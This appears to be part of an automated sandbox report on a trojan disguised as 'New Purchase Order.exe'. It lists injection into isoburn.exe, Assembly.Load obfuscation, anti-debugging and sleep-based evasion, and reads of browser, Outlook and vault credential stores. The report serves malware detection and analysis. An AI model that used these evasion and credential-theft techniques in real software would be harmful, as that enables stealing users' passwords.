                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_05252BE0 NtQueryValueKey,LdrInitializeThunk,12_2_05252BE0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_05252BF0 NtAllocateVirtualMemory,LdrInitializeThunk,12_2_05252BF0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_05252AF0 NtWriteFile,LdrInitializeThunk,12_2_05252AF0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_05252AD0 NtReadFile,LdrInitializeThunk,12_2_05252AD0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_052535C0 NtCreateMutant,LdrInitializeThunk,12_2_052535C0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_052539B0 NtGetContextThread,LdrInitializeThunk,12_2_052539B0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_05252D00 NtSetInformationFile,12_2_05252D00
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_05252DB0 NtEnumerateKey,12_2_05252DB0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_05252C00 NtQueryInformationProcess,12_2_05252C00
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_05252CF0 NtOpenProcess,12_2_05252CF0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_05252CC0 NtQueryVirtualMemory,12_2_05252CC0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_05252F60 NtCreateProcessEx,12_2_05252F60
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_05252FA0 NtQuerySection,12_2_05252FA0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_05252F90 NtProtectVirtualMemory,12_2_05252F90
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_05252E30 NtWriteVirtualMemory,12_2_05252E30
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_05252EA0 NtAdjustPrivilegesToken,12_2_05252EA0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_05252B80 NtQueryInformationFile,12_2_05252B80
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_05252AB0 NtWaitForSingleObject,12_2_05252AB0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_05253010 NtOpenDirectoryObject,12_2_05253010
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_05253090 NtSetValueKey,12_2_05253090
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_05253D10 NtOpenProcessToken,12_2_05253D10
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_05253D70 NtOpenThread,12_2_05253D70
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_02FB9210 NtReadFile,12_2_02FB9210
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_02FB93A0 NtClose,12_2_02FB93A0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_02FB9300 NtDeleteFile,12_2_02FB9300
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_02FB90A0 NtCreateFile,12_2_02FB90A0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_02FB9510 NtAllocateVirtualMemory,12_2_02FB9510
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_0524E8F012_2_0524E8F0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_052DAB4012_2_052DAB40
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_052D6BD712_2_052D6BD7
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_0521EA8012_2_0521EA80
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_052D757112_2_052D7571
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_052BD5B012_2_052BD5B0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_052DF43F12_2_052DF43F
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_0521146012_2_05211460
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_052DF7B012_2_052DF7B0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_052D16CC12_2_052D16CC
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_052EB16B12_2_052EB16B
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_0525516C12_2_0525516C
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_0520F17212_2_0520F172
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_0522B1B012_2_0522B1B0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_052D70E912_2_052D70E9
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_052DF0E012_2_052DF0E0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_052CF0CC12_2_052CF0CC
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_052270C012_2_052270C0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_052D132D12_2_052D132D
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_0520D34C12_2_0520D34C
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_0526739A12_2_0526739A
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_052252A012_2_052252A0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_052C12ED12_2_052C12ED
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_0523B2C012_2_0523B2C0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_052D7D7312_2_052D7D73
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_05223D4012_2_05223D40
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_052D1D5A12_2_052D1D5A
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_0523FDC012_2_0523FDC0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_05299C3212_2_05299C32
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_052DFCF212_2_052DFCF2
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_052DFF0912_2_052DFF09
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_052DFFB112_2_052DFFB1
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_05221F9212_2_05221F92
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_05229EB012_2_05229EB0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_052B591012_2_052B5910
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_0522995012_2_05229950
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_0523B95012_2_0523B950
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_0528D80012_2_0528D800
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_052238E012_2_052238E0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_052DFB7612_2_052DFB76
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_0523FB8012_2_0523FB80
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_05295BF012_2_05295BF0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_0525DBF912_2_0525DBF9
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_05293A6C12_2_05293A6C
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_052DFA4912_2_052DFA49
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_052D7A4612_2_052D7A46
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_05265AA012_2_05265AA0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_052BDAAC12_2_052BDAAC
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_052C1AA312_2_052C1AA3
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_052CDAC612_2_052CDAC6
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_02FA1C3012_2_02FA1C30
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_02F9CAF012_2_02F9CAF0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_02F9CAE812_2_02F9CAE8
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_02F9AE5012_2_02F9AE50
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_02F9AE4512_2_02F9AE45
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_02F9CD1012_2_02F9CD10
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_02F9AD0012_2_02F9AD00
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_02FA52C012_2_02FA52C0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_02FA34D012_2_02FA34D0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_02FBB9E012_2_02FBB9E0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_050BE77012_2_050BE770
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_050BE3D312_2_050BE3D3
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_050BE2B412_2_050BE2B4
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_050BD83812_2_050BD838
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: String function: 01735130 appears 58 times
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: String function: 0176EA12 appears 86 times
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: String function: 0177F290 appears 105 times
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: String function: 01747E54 appears 111 times
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: String function: 016EB970 appears 277 times
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: String function: 0528EA12 appears 86 times
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: String function: 0520B970 appears 277 times
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: String function: 05255130 appears 58 times
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: String function: 0529F290 appears 105 times
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: String function: 05267E54 appears 102 times
                Source: New Purchase Order.exe, 00000000.00000002.1297790798.0000000001454000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMsMpLics vs New Purchase Order.exe
                Source: New Purchase Order.exe, 00000000.00000002.1308258582.0000000009F00000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameMontero.dll8 vs New Purchase Order.exe
                Source: New Purchase Order.exe, 00000000.00000002.1297790798.000000000141E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs New Purchase Order.exe
                Source: New Purchase Order.exe, 00000000.00000000.1256910262.0000000000E52000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameFBjZ.exe0 vs New Purchase Order.exe
                Source: New Purchase Order.exe, 00000000.00000002.1298865239.00000000032A9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameArthur.dll" vs New Purchase Order.exe
                Source: New Purchase Order.exe, 00000000.00000002.1299749655.0000000004AA9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameArthur.dll" vs New Purchase Order.exe
                Source: New Purchase Order.exe, 00000000.00000002.1305864581.0000000008040000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameArthur.dll" vs New Purchase Order.exe
                Source: New Purchase Order.exe, 00000008.00000002.1802567314.00000000017ED000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs New Purchase Order.exe
                Source: New Purchase Order.exe, 00000008.00000002.1801973908.0000000001267000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameISOBURN.EXEj% vs New Purchase Order.exe
                Source: New Purchase Order.exe Binary or memory string: OriginalFilenameFBjZ.exe0 vs New Purchase Order.exe
                Source: New Purchase Order.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: New Purchase Order.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 0.2.New Purchase Order.exe.4d207a0.2.raw.unpack, HkgQ1AqdtvsFLjtQSt.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.New Purchase Order.exe.9f00000.5.raw.unpack, HkgQ1AqdtvsFLjtQSt.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.New Purchase Order.exe.9f00000.5.raw.unpack, s88TJA4JmXfoe4olV8.cs Security API names: _0020.SetAccessControl
                Source: 0.2.New Purchase Order.exe.9f00000.5.raw.unpack, s88TJA4JmXfoe4olV8.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.New Purchase Order.exe.9f00000.5.raw.unpack, s88TJA4JmXfoe4olV8.cs Security API names: _0020.AddAccessRule
                Source: 0.2.New Purchase Order.exe.4daadc0.3.raw.unpack, s88TJA4JmXfoe4olV8.cs Security API names: _0020.SetAccessControl
                Source: 0.2.New Purchase Order.exe.4daadc0.3.raw.unpack, s88TJA4JmXfoe4olV8.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.New Purchase Order.exe.4daadc0.3.raw.unpack, s88TJA4JmXfoe4olV8.cs Security API names: _0020.AddAccessRule
                Source: 0.2.New Purchase Order.exe.4d207a0.2.raw.unpack, s88TJA4JmXfoe4olV8.cs Security API names: _0020.SetAccessControl
                Source: 0.2.New Purchase Order.exe.4d207a0.2.raw.unpack, s88TJA4JmXfoe4olV8.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.New Purchase Order.exe.4d207a0.2.raw.unpack, s88TJA4JmXfoe4olV8.cs Security API names: _0020.AddAccessRule
                Source: 0.2.New Purchase Order.exe.4daadc0.3.raw.unpack, HkgQ1AqdtvsFLjtQSt.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@7/2@5/4
                Source: C:\Users\user\Desktop\New Purchase Order.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\New Purchase Order.exe.log
                Source: C:\Users\user\Desktop\New Purchase Order.exe Mutant created: NULL
                Source: C:\Windows\SysWOW64\isoburn.exe File created: C:\Users\user~1\AppData\Local\Temp\l420377x
                Source: New Purchase Order.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                Source: C:\Program Files\Mozilla Firefox\firefox.exe File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                Source: C:\Users\user\Desktop\New Purchase Order.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: isoburn.exe, 0000000C.00000003.2003864752.00000000034C4000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 0000000C.00000002.2501042971.00000000034E5000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 0000000C.00000002.2501042971.0000000003514000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 0000000C.00000003.2007358817.00000000034F0000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 0000000C.00000003.2003864752.00000000034E5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: New Purchase Order.exe ReversingLabs: Detection: 42%
                Source: unknown Process created: C:\Users\user\Desktop\New Purchase Order.exe "C:\Users\user\Desktop\New Purchase Order.exe"
                Source: C:\Users\user\Desktop\New Purchase Order.exe Process created: C:\Users\user\Desktop\New Purchase Order.exe "C:\Users\user\Desktop\New Purchase Order.exe"
                Source: C:\Program Files (x86)\keVtbkZBlaWEujnlOlWpgqxSwOUllhtPxqrloDkbHQTeoXmFgbUgspHOQRPjpWUnaQZex\ILRIqlNpKN.exe Process created: C:\Windows\SysWOW64\isoburn.exe "C:\Windows\SysWOW64\isoburn.exe"
                Source: C:\Windows\SysWOW64\isoburn.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\New Purchase Order.exe Section loaded: mscoree.dll
                Source: C:\Users\user\Desktop\New Purchase Order.exe Section loaded: apphelp.dll
                Source: C:\Users\user\Desktop\New Purchase Order.exe Section loaded: kernel.appcore.dll
                Source: C:\Users\user\Desktop\New Purchase Order.exe Section loaded: version.dll
                Source: C:\Users\user\Desktop\New Purchase Order.exe Section loaded: vcruntime140_clr0400.dll
                Source: C:\Users\user\Desktop\New Purchase Order.exe Section loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\Desktop\New Purchase Order.exe Section loaded: uxtheme.dll
                Source: C:\Users\user\Desktop\New Purchase Order.exe Section loaded: windows.storage.dll
                Source: C:\Users\user\Desktop\New Purchase Order.exe Section loaded: wldp.dll
                Source: C:\Users\user\Desktop\New Purchase Order.exe Section loaded: profapi.dll
                Source: C:\Users\user\Desktop\New Purchase Order.exe Section loaded: cryptsp.dll
                Source: C:\Users\user\Desktop\New Purchase Order.exe Section loaded: rsaenh.dll
                Source: C:\Users\user\Desktop\New Purchase Order.exe Section loaded: cryptbase.dll
                Source: C:\Users\user\Desktop\New Purchase Order.exe Section loaded: windowscodecs.dll
                Source: C:\Users\user\Desktop\New Purchase Order.exe Section loaded: amsi.dll
                Source: C:\Users\user\Desktop\New Purchase Order.exe Section loaded: userenv.dll
                Source: C:\Users\user\Desktop\New Purchase Order.exe Section loaded: msasn1.dll
                Source: C:\Users\user\Desktop\New Purchase Order.exe Section loaded: gpapi.dll
                Source: C:\Users\user\Desktop\New Purchase Order.exe Section loaded: iconcodecservice.dll
                Source: C:\Users\user\Desktop\New Purchase Order.exe Section loaded: dwrite.dll
                Source: C:\Windows\SysWOW64\isoburn.exe Section loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\isoburn.exe Section loaded: wininet.dll
                Source: C:\Windows\SysWOW64\isoburn.exe Section loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\isoburn.exe Section loaded: ieframe.dll
                Source: C:\Windows\SysWOW64\isoburn.exe Section loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\isoburn.exe Section loaded: netapi32.dll
                Source: C:\Windows\SysWOW64\isoburn.exe Section loaded: version.dll
                Source: C:\Windows\SysWOW64\isoburn.exe Section loaded: userenv.dll
                Source: C:\Windows\SysWOW64\isoburn.exe Section loaded: winhttp.dll
                Source: C:\Windows\SysWOW64\isoburn.exe Section loaded: wkscli.dll
                Source: C:\Windows\SysWOW64\isoburn.exe Section loaded: netutils.dll
                Source: C:\Windows\SysWOW64\isoburn.exe Section loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\isoburn.exe Section loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\isoburn.exe Section loaded: wldp.dll
                Source: C:\Windows\SysWOW64\isoburn.exe Section loaded: profapi.dll
                Source: C:\Windows\SysWOW64\isoburn.exe Section loaded: secur32.dll
                Source: C:\Windows\SysWOW64\isoburn.exe Section loaded: mlang.dll
                Source: C:\Windows\SysWOW64\isoburn.exe Section loaded: propsys.dll
                Source: C:\Windows\SysWOW64\isoburn.exe Section loaded: winsqlite3.dll
                Source: C:\Windows\SysWOW64\isoburn.exe Section loaded: vaultcli.dll
                Source: C:\Windows\SysWOW64\isoburn.exe Section loaded: wintypes.dll
                Source: C:\Windows\SysWOW64\isoburn.exe Section loaded: dpapi.dll
                Source: C:\Windows\SysWOW64\isoburn.exe Section loaded: cryptbase.dll
                Source: C:\Program Files (x86)\keVtbkZBlaWEujnlOlWpgqxSwOUllhtPxqrloDkbHQTeoXmFgbUgspHOQRPjpWUnaQZex\ILRIqlNpKN.exe Section loaded: wininet.dll
                Source: C:\Program Files (x86)\keVtbkZBlaWEujnlOlWpgqxSwOUllhtPxqrloDkbHQTeoXmFgbUgspHOQRPjpWUnaQZex\ILRIqlNpKN.exe Section loaded: mswsock.dll
                Source: C:\Program Files (x86)\keVtbkZBlaWEujnlOlWpgqxSwOUllhtPxqrloDkbHQTeoXmFgbUgspHOQRPjpWUnaQZex\ILRIqlNpKN.exe Section loaded: dnsapi.dll
                Source: C:\Program Files (x86)\keVtbkZBlaWEujnlOlWpgqxSwOUllhtPxqrloDkbHQTeoXmFgbUgspHOQRPjpWUnaQZex\ILRIqlNpKN.exe Section loaded: iphlpapi.dll
                Source: C:\Program Files (x86)\keVtbkZBlaWEujnlOlWpgqxSwOUllhtPxqrloDkbHQTeoXmFgbUgspHOQRPjpWUnaQZex\ILRIqlNpKN.exe Section loaded: fwpuclnt.dll
                Source: C:\Program Files (x86)\keVtbkZBlaWEujnlOlWpgqxSwOUllhtPxqrloDkbHQTeoXmFgbUgspHOQRPjpWUnaQZex\ILRIqlNpKN.exe Section loaded: rasadhlp.dll
                Source: C:\Users\user\Desktop\New Purchase Order.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
                Source: C:\Users\user\Desktop\New Purchase Order.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                Source: C:\Windows\SysWOW64\isoburn.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
                Source: New Purchase Order.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: New Purchase Order.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: isoburn.pdb source: New Purchase Order.exe, 00000008.00000002.1801973908.0000000001267000.00000004.00000020.00020000.00000000.sdmp, ILRIqlNpKN.exe, 0000000B.00000002.2502956260.0000000000FA8000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: isoburn.pdbGCTL source: New Purchase Order.exe, 00000008.00000002.1801973908.0000000001267000.00000004.00000020.00020000.00000000.sdmp, ILRIqlNpKN.exe, 0000000B.00000002.2502956260.0000000000FA8000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: ILRIqlNpKN.exe, 0000000B.00000000.1709984253.0000000000EBE000.00000002.00000001.01000000.0000000D.sdmp, ILRIqlNpKN.exe, 0000000F.00000000.1887839334.0000000000EBE000.00000002.00000001.01000000.0000000D.sdmp
                Source: Binary string: wntdll.pdbUGP source: New Purchase Order.exe, 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, isoburn.exe, 0000000C.00000003.1805994702.0000000005033000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 0000000C.00000002.2505224736.00000000051E0000.00000040.00001000.00020000.00000000.sdmp, isoburn.exe, 0000000C.00000002.2505224736.000000000537E000.00000040.00001000.00020000.00000000.sdmp, isoburn.exe, 0000000C.00000003.1802114946.0000000004E8F000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: New Purchase Order.exe, New Purchase Order.exe, 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, isoburn.exe, isoburn.exe, 0000000C.00000003.1805994702.0000000005033000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 0000000C.00000002.2505224736.00000000051E0000.00000040.00001000.00020000.00000000.sdmp, isoburn.exe, 0000000C.00000002.2505224736.000000000537E000.00000040.00001000.00020000.00000000.sdmp, isoburn.exe, 0000000C.00000003.1802114946.0000000004E8F000.00000004.00000020.00020000.00000000.sdmp

                Data Obfuscation

                Source: 0.2.New Purchase Order.exe.9f00000.5.raw.unpack, s88TJA4JmXfoe4olV8.cs .Net Code: IocPtpJIrf System.Reflection.Assembly.Load(byte[])
                Source: 0.2.New Purchase Order.exe.4ac1d80.1.raw.unpack, L2.cs .Net Code: System.Reflection.Assembly.Load(byte[])
                Source: 0.2.New Purchase Order.exe.8040000.4.raw.unpack, L2.cs .Net Code: System.Reflection.Assembly.Load(byte[])
                Source: 0.2.New Purchase Order.exe.4daadc0.3.raw.unpack, s88TJA4JmXfoe4olV8.cs .Net Code: IocPtpJIrf System.Reflection.Assembly.Load(byte[])
                Source: 0.2.New Purchase Order.exe.4d207a0.2.raw.unpack, s88TJA4JmXfoe4olV8.cs .Net Code: IocPtpJIrf System.Reflection.Assembly.Load(byte[])
                Source: New Purchase Order.exe Static PE information: section name: .text entropy: 7.7796093100623445
                Source: 0.2.New Purchase Order.exe.9f00000.5.raw.unpack, WeV4bcJvj4uq9ZuoU3.csHigh entropy of concatenated method names: 'ToString', 'lC88YInf2I', 'L8L835NrmD', 'VS88jarT8M', 'MEj8CaVwsF', 'Bjo8DqjAmE', 'TYS8ZSlgcU', 'Hhb8A37Q3A', 'nYQ8kudJaf', 'THu8Oo8krt'
                Source: C:\Users\user\Desktop\New Purchase Order.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\isoburn.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                Source: Yara match File source: Process Memory Space: New Purchase Order.exe PID: 6016, type: MEMORYSTR
                Source: C:\Windows\SysWOW64\isoburn.exe API/Special instruction interceptor: Address: 7FFB2CECD324
                Source: C:\Windows\SysWOW64\isoburn.exe API/Special instruction interceptor: Address: 7FFB2CECD7E4
                Source: C:\Windows\SysWOW64\isoburn.exe API/Special instruction interceptor: Address: 7FFB2CECD944
                Source: C:\Windows\SysWOW64\isoburn.exe API/Special instruction interceptor: Address: 7FFB2CECD504
                Source: C:\Windows\SysWOW64\isoburn.exe API/Special instruction interceptor: Address: 7FFB2CECD544
                Source: C:\Windows\SysWOW64\isoburn.exe API/Special instruction interceptor: Address: 7FFB2CECD1E4
                Source: C:\Windows\SysWOW64\isoburn.exe API/Special instruction interceptor: Address: 7FFB2CED0154
                Source: C:\Windows\SysWOW64\isoburn.exe API/Special instruction interceptor: Address: 7FFB2CECDA44
                Source: C:\Users\user\Desktop\New Purchase Order.exe Memory allocated: 3030000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\New Purchase Order.exe Memory allocated: 32A0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\New Purchase Order.exe Memory allocated: 5820000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\New Purchase Order.exe Memory allocated: 6820000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\New Purchase Order.exe Memory allocated: 6950000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\New Purchase Order.exe Memory allocated: 7950000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\New Purchase Order.exe Memory allocated: 9F90000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\New Purchase Order.exe Memory allocated: AF90000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\New Purchase Order.exe Memory allocated: BF90000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\New Purchase Order.exe Memory allocated: C420000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\New Purchase Order.exe Code function: 8_2_0173096E rdtsc 8_2_0173096E
                Source: C:\Users\user\Desktop\New Purchase Order.exe Thread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\isoburn.exe Window / User API: threadDelayed 9629
                Source: C:\Users\user\Desktop\New Purchase Order.exe API coverage: 0.7 %
                Source: C:\Windows\SysWOW64\isoburn.exe API coverage: 2.7 %
                Source: C:\Users\user\Desktop\New Purchase Order.exe TID: 5296 Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\isoburn.exe TID: 7852 Thread sleep count: 344 > 30
                Source: C:\Windows\SysWOW64\isoburn.exe TID: 7852 Thread sleep time: -688000s >= -30000s
                Source: C:\Windows\SysWOW64\isoburn.exe TID: 7852 Thread sleep count: 9629 > 30
                Source: C:\Windows\SysWOW64\isoburn.exe TID: 7852 Thread sleep time: -19258000s >= -30000s
                Source: C:\Windows\SysWOW64\isoburn.exe Last function: Thread delayed
                Source: C:\Windows\SysWOW64\isoburn.exe Code function: 12_2_02FAC4E0 FindFirstFileW,FindNextFileW,FindClose, 12_2_02FAC4E0
                Source: C:\Users\user\Desktop\New Purchase Order.exe Process information queried: ProcessInformation
                Source: C:\Users\user\Desktop\New Purchase Order.exe Process queried: DebugPort
                Source: C:\Windows\SysWOW64\isoburn.exe Process queried: DebugPort
                Source: C:\Users\user\Desktop\New Purchase Order.exe Code function: 8_2_00417723 LdrLoadDll, 8_2_00417723
                Source: C:\Users\user\Desktop\New Purchase Order.exe Code function: 8_2_017C4164 mov eax, dword ptr fs:[00000030h] 8_2_017C4164
                Source: C:\Users\user\Desktop\New Purchase Order.exe Code function: 8_2_01788158 mov eax, dword ptr fs:[00000030h] 8_2_01788158
                Source: C:\Users\user\Desktop\New Purchase Order.exe Code function: 8_2_016EC156 mov eax, dword ptr fs:[00000030h] 8_2_016EC156
